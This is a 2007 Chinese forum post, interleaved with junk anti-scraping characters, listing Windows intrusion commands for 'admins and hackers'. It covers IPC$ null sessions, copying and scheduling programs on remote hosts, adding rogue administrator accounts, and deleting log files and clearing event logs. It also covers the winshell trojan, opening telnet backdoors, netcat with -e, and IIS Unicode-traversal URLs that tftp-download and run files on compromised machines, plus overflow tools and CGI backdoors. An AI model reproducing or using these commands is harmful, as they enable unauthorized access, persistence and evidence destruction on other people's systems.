找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 717|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" 8 V; ` q6 |3 y: c; s7 Y( k   以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" * G- ^. c- F: l- G( L  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ : G& V0 b% a& Q" L0 i4 R, u! G& j8 r5 j   查看远程主机时间 net time \IP地址 1 \/ y/ k$ s! k3 M* K  定时启动某个程序 at \IP地址 02:18 readme.exe : E0 m/ U$ f: f1 b   查看共享 net view \IP地址 8 p" {6 Q0 s& h6 A# {( |   查看netbios工作组列表 nBTstat -A IP地址 6 o% f$ t6 x) t$ q# `5 I5 r" ?1 k- R   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" : I6 I& F8 w# y+ J2 ~' w  这两条把自己增加到管理员组: net user 用户名 密码 /add , F# g( t' v% J% C8 w5 D& W/ P" @   net locaLGroup Administrators 用户名 /add / A/ M+ [7 J+ f3 K ]3 p: B- [  断开连接 net use \IP地址ipc$ /delete $ R7 E4 W) a4 { Y9 b+ K4 A" B5 F+ X2 P. |, i/ j6 w) M   扫尾: " w3 I4 I7 v) o' ~/ q   del C:winntsystem32logfiles*.* 6 ]7 ~0 O: ^$ n0 Y5 b  del C:winntssytem32config*.evt : l) a* `& V& A0 \4 F. G! i3 O" M8 v  del C:winntsystem32dTCLog*.* 0 u, T3 |8 |; S& y  del C:winntsystem32*.log # c2 F% N5 P, v* f9 X9 V6 b  del C:winntsystem32*.txt w% V2 W1 @. C# a" x, W5 F   del C:winnt*.txt 6 t9 \# o0 p0 L& u  del C:winnt*.log 6 Q( \5 _! ^3 R- S1 g9 {. h c0 [ C0 V- r3 _: G 一、netsvc.exe 9 X+ }+ D0 o0 W0 i" [4 ]; R  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: ; j( }; {) F8 }- S' s   netsvc /list \IP地址 9 c( T1 }& C- x. y5 E  netsvc schedule \IP地址 /query 4 E1 W* U+ l" ]. Z' R  netsvc \IP地址 schedule /start - [ l1 l9 L) z3 e' I2 r5 v2 g2 e t4 }7 t7 E1 O3 B 二、OpenTelnet.exe 5 K- J4 C' {8 d( O1 P   远程启动主机的Telnet服务,并绑定端口到7878,例如: : A. [9 w9 I- A- j$ ~) v# Y1 I1 T1 J! `   OpenTelnet \IP地址 用户名 密码 1 7878 5 O3 B+ b( u. I7 J5 |/ ]  然后就可以telnet到主机的7878端口,进入DOS方式下: " M6 n; F; j$ O   telnet IP地址 7878 0 ~& K( t1 b! X0 K" c. c1 u , _0 _7 Q) w. C, s8 ]7 U三、winshell.exe 2 q/ q+ y+ r- _+ Y% b) F4 {   一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 9 U1 r3 u6 \1 y( M0 i" X3 K( C' n   p Path (查看winshell主程序的路径信息) + `3 i: E5 I; a/ P! A. @  b reBoot (重新启动机器) 3 @. g. n- [/ f$ g% O  d shutDown (关闭机器) , f# A6 C4 ^8 k" A- V   s Shell (执行后你就会看到可爱的“C:>”) : @- N w6 H7 i' x" q B& R; }& |  x eXit (退出本次登录会话,此命令并不终止winshell的运行) / ?5 m% |4 H$ ^  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 3 J3 J! A4 {4 `! w $ V# |% n& a' Y7 d; f* r四、3389登陆器,GUI方式登录远程主机的 1 O4 ?, y9 q& [! L6 b/ E 5 ~2 V6 ~8 U8 {9 j五、elsave.exe 2 f# O7 K! F& u) \" j  事件日志清除工具 3 P$ p$ N+ ^8 P6 S4 n, |  elsave -s \IP地址 -l "application" -C ; F v+ K3 B: U2 C4 e0 `. E$ J   elsave -s \IP地址 -l "system" -C 8 x3 V# \, u& h: ]. {( g   elsave -s \IP地址 -l "security" -C 0 E$ v" T9 w) X7 L- Y  执行后成功清除应用程序日志,系统日志,安全日志 4 f" U8 v. b. I, j8 O$ N六、hbulot.exe 5 p2 o4 L6 r0 j0 I) ? q* h   开启win2kserver和winxp的3389服务 & p, D X/ W& @# i4 o   hbulot (/r) 9 M/ U3 H9 I: _5 y+ U. ^& _. r Y. F 七、nc.exe(netcat.exe) 4 D$ `" S+ p( f p5 x   一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 & M" ?! F3 i) s2 s9 F. O! p  想要连接到某处: nc (-options) hostname port(s)(ports) ... ! [ Z0 S0 s6 ?' {2 N* b. G   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) 9 b: W: L3 _2 k9 D% c: O ( a0 F1 U1 F+ x 参数: 6 @) _" e* d. X0 }+ f4 a   -e prog 程序重定向,一旦连接,就执行 (危险!) m! L1 V$ o P6 K4 x" a% z  -g gateway source-routing hop point(s), up to 8 ' M- W2 Z+ u7 ]5 n   -G num source-routing pointer: 4, 8, 12, ...7 m3 S4 C5 a& f2 i, j; i1 I- T: J' J   -h 帮助信息 . S/ G% _3 j7 J   -i secs 延时的间隔 - X, R5 N1 F) Z5 |: x6 ?6 }/ ^  -l 监听模式,用于入站连接 ' e/ F7 a, q4 K5 q* z. Y4 ~, g9 d   -n 指定数字的IP地址,不能用hostname 0 p1 H- F7 o" V8 S( g$ q   -o file 记录16进制的传输 % F0 x4 z$ S& O/ b  -p port 本地端口号 2 b0 Y- g) S% u& M  -r 任意指定本地及远程端口 # g( N, S; V3 p+ q4 m L  -s addr 本地源地址 ! u- G; q* W5 }  -u UDP模式 . l" \& l# e* j+ ` K  -v 详细输出——用两个-v可得到更详细的内容 $ k/ M1 P7 i: e( H8 F8 f5 J- Q   -w secs timeout的时间 1 O, [: N4 i! g' D( f! x   -z 将输入输出关掉——用于扫描时 9 w& i4 X( h5 Y . ~" G6 I* T6 ~+ [' } 八、TFTPD32.EXE - @! W. x8 D% w* `# A! k! n4 h& E   把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: . x8 b/ E- F: f; @  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 1 I7 e7 B2 b: O$ y+ }$ o. m  然后可以直接令文件运行: # b& v/ W& C5 m; R! J6 ^ f2 o) i   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 9 `. C, w; r3 ?/ g : h2 t4 }, p/ ~九、prihack.exe是IIS的printer远程缓冲区溢出工具 ) q& y4 Y- ^1 ?8 S; a F2 y0 P  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 " u' k3 j, y* E! r' g 8 _* m; a; C1 G( {4 q6 B. I+ a7 S一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2024-11-24 18:36

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表